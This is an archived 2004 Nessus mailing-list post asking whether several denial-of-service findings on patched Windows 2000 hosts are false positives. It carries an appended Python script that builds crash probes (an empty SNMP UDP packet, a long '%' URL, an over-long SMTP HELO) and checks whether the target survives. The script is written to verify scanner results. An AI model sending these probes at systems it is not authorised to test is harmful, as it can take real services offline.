Pen testing questions

Rob Notaro Rob.Notaro at sman.com
Fri Nov 19 14:59:33 EST 2004


I recently pen tested a domain I oversee and came across the following
holes that were puzzlers.

 

snmp (161/tcp) High

It was possible to crash either the remote host or the firewall in between us
and the remote host by sending a UDP packet of null size to port 161 (snmp).
This flaw may allow an attacker to shut down your network.

CVE : CVE-2000-0221
BID : 1009


My gear is behind a Cisco router and PIX not Nortel as the Bugtraq ID
suggests.  I'm also blocking all SNMP traffic at the router and firewall
so I'm not sure why this went off.

 

http (80/tcp) High

It was possible to make IIS use 100% of the CPU by sending it malformed
extension data in the URL requested, preventing it from serving web pages to
legitimate clients.

Solution : Microsoft has made patches available at :
- For Internet Information Server 4.0:
  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20906
- For Internet Information Server 5.0:
  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20904

Risk factor : High
CVE : CVE-2000-


Already have SP3 on Win2k which negates this update. 

 

general/tcp High

It was possible to crash the remote machine by flooding it with ICMP type 9
packets. A cracker may use this attack to make this host crash continuously,
preventing you from working properly.

Solution : upgrade your Windows 9x operating system or change it.
Reference : http://support.microsoft.com/default.aspx?scid=KB;en-us;q216141


and

 

http (80/tcp) High

The remote web server dies when an URL consisting of a long invalid string of
% is sent. A cracker may use this flaw to make your server crash continually.

Solution : upgrade your server or firewall it.
Risk factor : High


Running Windows 2000 server with latest patches on this machine.

 

 

smtp (25/tcp) High

It was possible to perform a denial of service against the remote Interscan
SMTP server by sending it a special long HELO command. This problem allows an
attacker to prevent your Interscan SMTP server from handling requests.

Solution : contact your vendor for a patch.
Risk factor : High
CVE : CAN-1999-1529
BID : 787


Exchange 2003 on Windows 2000 with latest patches.  

 

general/udp High

It was possible to make the remote server crash using the 'bonk' attack. An
attacker may use this flaw to shut down this server, thus preventing your
network from working properly.

Solution : contact your operating system vendor for a patch.
Risk factor : High
CVE : CAN-1999-0258


Is this a false positive?  Fully patched Win2K server.



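Retesting findings like these by hand, as an added example that is not part of the original post or of Nessus: the denial-of-service plugins of this vintage decide that a target "crashed" when it stops answering after the probe, so a firewall that silently drops the probe and then interferes with the follow-up check could produce verdicts like the SNMP and ICMP ones quoted above even though nothing died. The script below sends the probes the scan output describes (an empty UDP datagram to 161/udp, a URL that is a long run of '%', an over-long SMTP HELO) and wraps each in an explicit before-and-after liveness check against a port known to be open. The payload lengths, the 127.0.0.1 target and the local EchoListener stand-in are assumptions chosen so it runs offline; point `retest` at the real host and a port you know is open to reproduce a finding.

```python
import socket
import threading
import time

# Constructed probes following the scan output's descriptions; the lengths
# are assumptions, not the values the scanner plugins use.
def snmp_null_udp() -> bytes:
    return b""

def iis_percent_url(length: int = 8000) -> bytes:
    return b"GET /" + b"%" * length + b" HTTP/1.0\r\n\r\n"

def long_helo(length: int = 8000) -> bytes:
    return b"HELO " + b"A" * length + b"\r\n"

def tcp_alive(host: str, port: int, timeout: float = 2.0) -> bool:
    """Liveness check: can we complete a TCP handshake to a known-open port?"""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def send_udp(host: str, port: int, payload: bytes) -> None:
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(payload, (host, port))

def send_tcp(host: str, port: int, payload: bytes, timeout: float = 2.0) -> None:
    """Deliver a TCP probe and wait briefly for any reply; errors are expected."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            s.sendall(payload)
            s.recv(1024)
    except OSError:
        pass

def retest(host, liveness_port, deliver, retries=3, delay=1.0) -> str:
    """'not-alive-before': liveness port already unreachable, so silence after
    the probe proves nothing (a firewall or rate limit is the usual cause);
    'alive-after': host still answers (likely false positive);
    'down-after': host stopped answering only after the probe (reproduced)."""
    if not tcp_alive(host, liveness_port):
        return "not-alive-before"
    deliver()
    for _ in range(retries):
        if tcp_alive(host, liveness_port):
            return "alive-after"
        time.sleep(delay)
    return "down-after"

class EchoListener:
    """Constructed stand-in for the target: answers every connection with a
    minimal HTTP reply. If a request starts with crash_on, it stops listening,
    simulating a service that really does die on the probe."""
    def __init__(self, crash_on: bytes = b""):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(5)
        self.sock.settimeout(0.2)  # so the accept loop notices close()
        self.port = self.sock.getsockname()[1]
        self.crash_on = crash_on
        self.running = True
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while self.running:
            try:
                conn, _ = self.sock.accept()
            except socket.timeout:
                continue
            except OSError:
                return
            with conn:
                conn.settimeout(0.5)
                try:
                    data = conn.recv(65536)
                    if self.crash_on and data.startswith(self.crash_on):
                        self.running = False
                        self.sock.close()  # "crash": stop accepting connections
                        return
                    conn.sendall(b"HTTP/1.0 200 OK\r\n\r\n")
                except OSError:
                    pass  # peer closed early (e.g. a bare liveness handshake)

    def close(self):
        self.running = False
        self.sock.close()

def demo() -> dict:
    """'%'-URL and null-UDP probes against a healthy listener, then the '%'-URL
    probe against a listener that dies on it. Port 161 here is loopback with
    no SNMP agent, which is enough to exercise the UDP path offline."""
    host, results = "127.0.0.1", {}
    healthy = EchoListener()
    results["http_percent"] = retest(host, healthy.port,
        lambda: send_tcp(host, healthy.port, iis_percent_url()), retries=2, delay=0.1)
    results["snmp_null"] = retest(host, healthy.port,
        lambda: send_udp(host, 161, snmp_null_udp()), retries=2, delay=0.1)
    healthy.close()
    fragile = EchoListener(crash_on=b"GET /%")
    results["http_percent_crash"] = retest(host, fragile.port,
        lambda: send_tcp(host, fragile.port, iis_percent_url()), retries=2, delay=0.1)
    fragile.close()
    return results

if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

The liveness port is deliberately separate from the probed port: the question is whether the host (or the firewall in front of it) went away, not whether one service answered, and a "not-alive-before" result is the signature of a scan that was really talking to a filtering device rather than the target.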


More information about the Nessus mailing list